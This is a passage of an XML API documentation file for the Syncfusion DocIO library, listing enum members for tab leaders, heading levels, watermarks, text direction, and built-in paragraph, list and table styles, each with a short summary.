            Dotted leader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabLeader.Hyphenated">
            <summary>
            Hyphenated leader.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabLeader.Single">
            <summary>
            Single line leader. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TabLeader.Heavy">
            <summary>
            Heavy line leader.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TableRowHeightType">
            <summary>
            Specifies the table row height type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TableRowHeightType.AtLeast">
            <summary>
            "At least" table row height type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TableRowHeightType.Exactly">
            <summary>
            " Exactly" table row height type
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ListNumberAlignment">
            <summary>
            Specifies the list number alignment.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListNumberAlignment.Left">
            <summary>
            Left align.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListNumberAlignment.Center">
            <summary>
            Center align.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ListNumberAlignment.Right">
            <summary>
            Right align.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FollowCharacterType">
            <summary>
            Specifies the type of character following the list level number text for the paragraph.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FollowCharacterType.Tab">
            <summary>
            List levels number or bullet is followed by tab.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FollowCharacterType.Space">
            <summary>
            List levels number or bullet is followed by space.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FollowCharacterType.Nothing">
            <summary>
            Follow character isn't used.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PictureColor">
            <summary>
            specifies the picture color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PictureColor.Automatic">
            <summary>
            Picture automatic color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PictureColor.Grayscale">
            <summary>
            Picture gray-scale color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PictureColor.BlackAndWhite">
            <summary>
            Picture black and white color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.PictureColor.Washout">
            <summary>
            Picture washout color.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ChapterPageSeparatorType">
            <summary>
            Specifies the type of separator to chapter pages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ChapterPageSeparatorType.Hyphen">
            <summary>
            A hyphen.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ChapterPageSeparatorType.Period">
            <summary>
            A period.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ChapterPageSeparatorType.Colon">
            <summary>
            A colon.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ChapterPageSeparatorType.EmDash">
            <summary>
            An emphasized dash.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ChapterPageSeparatorType.EnDash">
            <summary>
            A standard dash.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.HeadingLevel">
            <summary>
            Specifies the level of the heading.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.None">
            <summary>
            No heading level.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading1">
            <summary>
            Heading level 1.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading2">
            <summary>
            Heading level 2.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading3">
            <summary>
            Heading level 3.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading4">
            <summary>
            Heading level 4.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading5">
            <summary>
            Heading level 5.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading6">
            <summary>
            Heading level 6.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading7">
            <summary>
            Heading level 7.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading8">
            <summary>
            Heading level 8.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.HeadingLevel.Heading9">
            <summary>
            Heading level 9.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BreakType">
            <summary>
            Specifies the type of the break.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakType.PageBreak">
            <summary>
            Page break type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakType.ColumnBreak">
            <summary>
            Column break type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BreakType.LineBreak">
            <summary>
            Line break type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WatermarkType">
            <summary>
            Specifies the watermark type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WatermarkType.NoWatermark">
            <summary>
            No watermark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WatermarkType.PictureWatermark">
            <summary>
            Picture watermark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WatermarkType.TextWatermark">
            <summary>
            Text watermark.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WatermarkLayout">
            <summary>
            Specifies the watermark layout.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WatermarkLayout.Diagonal">
            <summary>
            Diagonal watermark layout.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WatermarkLayout.Horizontal">
            <summary>
            Horizontal watermark layout.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BackgroundType">
            <summary>
            Specifies the type of the background.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundType.NoBackground">
            <summary>
            No background fill effect.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundType.Gradient">
            <summary>
            Gradient fill effect.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundType.Picture">
            <summary>
            Picture fill effect.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundType.Texture">
            <summary>
            Texture fill effect.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BackgroundType.Color">
            <summary>
            Color fill effect.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.GradientShadingStyle">
             <summary>
            Specifies the shading styles for Gradient background effect. 
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingStyle.Horizontal">
            <summary>
            Horizontal shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingStyle.Vertical">
            <summary>
            Vertical shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingStyle.DiagonalUp">
            <summary>
            Diagonal Up shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingStyle.DiagonalDown">
            <summary>
            Diagonal Down shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingStyle.FromCorner">
            <summary>
            From Corner shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingStyle.FromCenter">
            <summary>
            From Center shading style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.GradientShadingVariant">
            <summary>
            Speecifies the shading variants for background gradient.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingVariant.ShadingUp">
            <summary>
            Shading in the upper part.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingVariant.ShadingDown">
            <summary>
            Shading in the lower part.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingVariant.ShadingOut">
            <summary>
            Shading in upper and lower parts.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.GradientShadingVariant.ShadingMiddle">
            <summary>
            Shading in the middle.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FormFieldType">
            <summary>
            Specifies the type of a form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormFieldType.TextInput">
            <summary>
            Text form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormFieldType.CheckBox">
            <summary>
            Check box form field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FormFieldType.DropDown">
            <summary>
            Drop-down form field.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.CheckBoxSizeType">
            <summary>
            Specifies the checkBox size type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CheckBoxSizeType.Auto">
            <summary>
            Auto check box size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.CheckBoxSizeType.Exactly">
            <summary>
            Exact check box size.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextFormat">
            <summary>
            Specifies the format of the text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextFormat.None">
            <summary>
            No text formatting
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextFormat.Uppercase">
            <summary>
            Uppercase text formatting.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextFormat.Lowercase">
            <summary>
            Lowercase text formatting.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextFormat.FirstCapital">
            <summary>
            First capital text formatting.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextFormat.Titlecase">
            <summary>
            Title case text formatting.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.NumberFormat">
            <summary>
            Specifies the format of the number.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.None">
            <summary>
            No formatting 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.WholeNumber">
            <summary>
            Format with whole number.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.FloatingPoint">
            <summary>
            Format with floating point number.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.WholeNumberPercent">
            <summary>
            Whole number in percents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.FloatingPointPercent">
            <summary>
            Floating point number in percents. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.WholeNumberWithSpace">
            <summary>
            Format which suits to "#�##0" Word format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.FloatingPointWithSpace">
            <summary>
            Format which suites to "#�##0,00" Word format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.NumberFormat.CurrencyFormat">
            <summary>
            Format which suites to "#�##0,00 $;(#�##0,00 $)" Word format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextDirection">
            <summary>
            Specifies the direction of text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextDirection.Horizontal">
            <summary>
            Text flows horizontally. <i>default</i>.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextDirection.VerticalFarEast">
            <summary>
            Text flows vertically and reads from top to bottom, right to left in order to read Far East Languages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextDirection.VerticalBottomToTop">
            <summary>
            Text flows vertically and reads from bottom to top.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextDirection.VerticalTopToBottom">
            <summary>
            Text flows vertically and reads from top to bottom.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextDirection.HorizontalFarEast">
            <summary>
            Text flows horizontally and reads from right to left in order to read Far East Languages.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextDirection.Vertical">
            <summary>
             Text flows vertically and reads from top to bottom, left to right.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.DocTextDirection">
            <summary>
            Specifies the direction of text.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocTextDirection.LeftToRight">
            <summary>
            Text flows in left to right order.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocTextDirection.TopToBottom">
            <summary>
            Text flows in Top to bottom order.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocTextDirection.TopToBottomRotated">
            <summary>
            Text flows in Top to bottom order and rotated.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocTextDirection.LeftToRightRotated">
            <summary>
            Text flows in left to right order and rotated.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocTextDirection.RightToLeft">
            <summary>
            Text flows in right to left order.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.DocTextDirection.RightToLeftRotated">
            <summary>
            Text flows in right to left order and rotated.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.FieldMarkType">
            <summary>
            Specifies the type of field mark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldMarkType.FieldSeparator">
            <summary>
            Field separator type
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.FieldMarkType.FieldEnd">
            <summary>
            Field end type.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BuiltinStyle">
            <summary>
            Specifies the built-in styles.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Normal">
            <summary>
            Normal style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading1">
            <summary>
            Heading level 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading2">
            <summary>
            Heading level 2  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading3">
            <summary>
            Heading level 3  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading4">
            <summary>
            Heading level 4  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading5">
            <summary>
            Heading level 5  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading6">
            <summary>
            Heading level 6  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading7">
            <summary>
            Heading level 7  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading8">
            <summary>
            Heading level 8  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Heading9">
            <summary>
            Heading level 9  style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index1">
            <summary>
            Index 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index2">
            <summary>
            Index 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index3">
            <summary>
            Index 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index4">
            <summary>
            Index 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index5">
            <summary>
            Index 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index6">
            <summary>
            Index 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index7">
            <summary>
            Index 7 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index8">
            <summary>
            Index 8 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Index9">
            <summary>
            Index 9 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc1">
            <summary>
            Table of content 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc2">
            <summary>
            Table of content 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc3">
            <summary>
            Table of content 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc4">
            <summary>
            Table of content 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc5">
            <summary>
            Table of content 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc6">
            <summary>
            Table of content 6 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc7">
            <summary>
            Table of content 7 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc8">
            <summary>
            Table of content 8 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Toc9">
            <summary>
            Table of content 9 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.NormalIndent">
            <summary>
            Normal indent style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.FootnoteText">
            <summary>
            Footnote text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.CommentText">
            <summary>
            Comment text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Header">
            <summary>
            Header style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Footer">
            <summary>
            Footer style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.IndexHeading">
            <summary>
            Index heading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Caption">
            <summary>
            Caption style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.TableOfFigures">
            <summary>
            Table of figures style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.FootnoteReference">
            <summary>
            Footnote reference style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.CommentReference">
            <summary>
            Comment reference style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.LineNumber">
            <summary>
            Line number style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.PageNumber">
            <summary>
            Page number style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.EndnoteReference">
            <summary>
            Endnote reference style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.EndnoteText">
            <summary>
            Endnote text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.TableOfAuthorities">
            <summary>
            Table of authorities style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.MacroText">
            <summary>
            Macro text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ToaHeading">
            <summary>
            TOA heading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.List">
            <summary>
            List style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListBullet">
            <summary>
            List bullet style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListNumber">
            <summary>
            List number style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.List2">
            <summary>
            List 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.List3">
            <summary>
            List 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.List4">
            <summary>
            List 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.List5">
            <summary>
            List 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListBullet2">
            <summary>
            List bullet 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListBullet3">
            <summary>
            List bullet 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListBullet4">
            <summary>
            List bullet 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListBullet5">
            <summary>
            List bullet 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListNumber2">
            <summary>
            List number 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListNumber3">
            <summary>
            List number 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListNumber4">
            <summary>
            List number 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListNumber5">
            <summary>
            List number 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Title">
            <summary>
            Title style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Closing">
            <summary>
            Closing style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Signature">
            <summary>
            Signature style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.DefaultParagraphFont">
            <summary>
            Default paragraph font style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyText">
            <summary>
            Body text stye.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyTextInd">
            <summary>
            Body text indent style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListContinue">
            <summary>
            List continue style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListContinue2">
            <summary>
            List continue 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListContinue3">
            <summary>
            List continue 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListContinue4">
            <summary>
            List continue 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.ListContinue5">
            <summary>
            List continue 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.MessageHeader">
            <summary>
            Message header style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Subtitle">
            <summary>
            Bub title style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Salutation">
            <summary>
            Salutation style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Date">
            <summary>
            Date style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyText1I">
            <summary>
            Body Text 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyText1I2">
            <summary>
            Body Text 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.NoteHeading">
            <summary>
            Note heading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyText2">
            <summary>
            Body text 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyText3">
            <summary>
            Body text 3 style. 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyTextInd2">
            <summary>
            Body text indent 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BodyTextInd3">
            <summary>
            Body text indent 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BlockText">
            <summary>
            Block text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Hyperlink">
            <summary>
            Hyperlink style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.FollowedHyperlink">
            <summary>
            Followed hyperlink style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Strong">
            <summary>
            Strong style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.Emphasis">
            <summary>
            Emphasis style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.DocumentMap">
            <summary>
            Document map style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.PlainText">
            <summary>
            Plain text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.EmailSignature">
            <summary>
            Email signature style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.NormalWeb">
            <summary>
            Normal web style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlAcronym">
            <summary>
            Html acronym style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlAddress">
            <summary>
            Html address style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlCite">
            <summary>
            Html cite style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlCode">
            <summary>
            Html code style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlDefinition">
            <summary>
            Html definition style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlKeyboard">
            <summary>
            Html keyboard style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlPreformatted">
            <summary>
            Html pre-formatted style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlSample">
            <summary>
            Html sample style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlTypewriter">
            <summary>
            Html type writer style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.HtmlVariable">
            <summary>
            Html variable style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.CommentSubject">
            <summary>
            Comment subject style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.NoList">
            <summary>
            No list style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.BalloonText">
            <summary>
            Balloon text style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.User">
            <summary>
            User style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinStyle.NoStyle">
            <summary>
            No style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BuiltinListStyle">
            <summary>
            Specifies the built-in list styles.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListBullet">
            <summary>
            List bullet style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListNumber">
            <summary>
            List number style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListBullet2">
            <summary>
            List bullet 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListBullet3">
            <summary>
            List bullet 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListBullet4">
            <summary>
            List bullet 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListBullet5">
            <summary>
            List bullet 5 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListNumber2">
            <summary>
            List number 2 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListNumber3">
            <summary>
            List number 3 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListNumber4">
            <summary>
            List number 4 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinListStyle.ListNumber5">
            <summary>
            List number 5 style.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.BuiltinTableStyle">
            <summary>
            Specifies the built-in table styles.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableNormal">
            <summary>
            Table normal style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.TableGrid">
            <summary>
            Table grid style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShading">
            <summary>
            Light shading style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShadingAccent1">
            <summary>
            Light shading accent 1 style.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.BuiltinTableStyle.LightShadingAccent2">
            <summary>
            Light shading accent 2 style.
            </summary>
        </member>
